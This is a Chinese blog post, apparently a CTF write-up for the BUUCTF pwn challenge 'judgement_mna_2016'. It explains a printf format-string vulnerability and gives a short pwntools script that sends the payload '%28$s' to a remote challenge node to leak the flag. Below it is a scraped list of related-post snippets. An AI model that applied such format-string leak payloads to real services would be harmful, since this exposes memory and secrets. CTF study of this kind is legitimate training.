BUUCTF之“judgement_mna_2016”
这题本身比较简单,但是增强了一丝丝漏洞意识
看到flag在文中又看到printf显然想到格式化字符串漏洞泄露内存,,,
关键是计算偏移:这里我再次分别利用ubuntu21 和ubuntu 16都gdb调试了一下,发现ubuntu21的调试偏移计算结果不一样,,,,,离谱之。
from pwn import*
p=remote('node4.buuoj.cn',28336)
payload="%28$s"
p.sendlineafter("flag >>",payload)
p.interactive()
BUUCTF之“judgement_mna_2016”相关推荐
- [BUUCTF]PWN——judgement_mna_2016(32位fmt)
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的 ...
- BUUCTF的Web真题学习整理(一)
目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...
- [BUUCTF-pwn]——judgement_mna_2016
[BUUCTF-pwn]--judgement_mna_2016 还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试. 一看就知道这个地方储存的flag, ...
- BUUCTF寒假刷题-Web
前言 寒假横向刷题(尽量) BUUCTF
- BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...
- BUUCTF刷题笔记
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...
- BUUCTF Quoted-printable编码
Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...
- BUUCTF NewStarCTF一些新知识记录
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...
- buuctf Mark loves cat
buuctf Mark loves cat 打开是个静态页面,源码也无任何有用信息 dirsearch扫描后发现.git泄露 GitHack.py下载得到两个php文件,接下来就是代码审计: flag ...
最新文章
- GCC中同时使用动态和静态库链接的编译
- java pdf水印排布问题_Java实现pdf文件添加水印,铺满全页。
- ABAP ALV检查单元格更新数据
- Python爬虫开发:post请求(用户登录)
- Apache Tomcat Configuration Reference
- http协议与web本质
- 小小c语言贪吃蛇思路,【图片】C语言小游戏~贪吃蛇【c语言吧】_百度贴吧
- linux 进程0 写时复制,linux 写时复制 COW 过程梳理
- 关于CodeReview
- SQLSERVER中如何快速比较两张表的不一样
- VC Studio集成开发环境下编译Apache--jin点滴实验手记
- CBD将建智慧城市管理平台
- Java 学生成绩管理系统(基于GUI和数据库的建立)
- 中国象棋matlab
- RIP总结(转自鸿鹄论坛)
- 由pushViewController说起可能出线的各种死法
- Windows上必备的7个国产小众软件,每一个都是良心推荐,建议常备使用哦。
- 深度揭秘:到底什么是“授时”
- 建立统一标准的教育大数据
- 易语言 如何调用麦谈帮API接口?
热门文章
- 联想x3300 m4服务器维修,【联想x3300 M4参数】联想x3300 M4系列服务器参数-ZOL中关村在线...
- 谷歌生物医学专用翻译_[Windows]学生党福利,文献翻译神器,附有生物医学专用引擎哦!...
- Java学习参考书籍
- 二零一五,谁偷走了我的青春
- Android okHttp封装库(2) -- okhttp-OkGo
- 笨拙的手指 代码优化版
- 三角形加几笔能变成什么_一个圆添上几笔能出来什么形状?例如:表,太阳,向日葵.-圆形加几笔得什么事物-数学-伍靖都同学...
- 国科大学习资料--最优化计算方法(王晓)--第七次作业答案
- The Biggest Water Problem
- access quick 取消显示_如何清除 windows中quick access